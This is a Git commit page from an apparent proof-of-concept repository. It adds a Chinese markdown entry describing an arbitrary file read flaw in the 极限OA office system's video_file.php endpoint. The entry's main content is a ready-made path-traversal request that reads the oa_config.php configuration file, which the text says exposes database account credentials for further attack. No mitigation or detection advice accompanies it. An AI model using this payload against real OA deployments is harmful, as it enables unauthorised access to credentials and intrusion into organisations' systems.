dontian122/POC
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

整理文件

Browse Source
This commit is contained in:
wy876
2024-08-21 15:08:43 +08:00
parent fcad930af3
commit 299ba35f30
1043 changed files with 0 additions and 3 deletions
Download Patch File Download Diff File Expand all files Collapse all files

11
极限OA/极限OA接口video_file.php存在任意文件读取漏洞.md Normal file
View File

@@ -0,0 +1,11 @@
## 极限OA接口video_file.php存在任意文件读取漏洞
极限OA video_file.php 处存在任意文件读取,攻击者可以从其中获取网站路径和数据库账号密码等敏感信息进一步攻击。
## poc
```
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
```
![image-20240621191009647](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406211910698.png)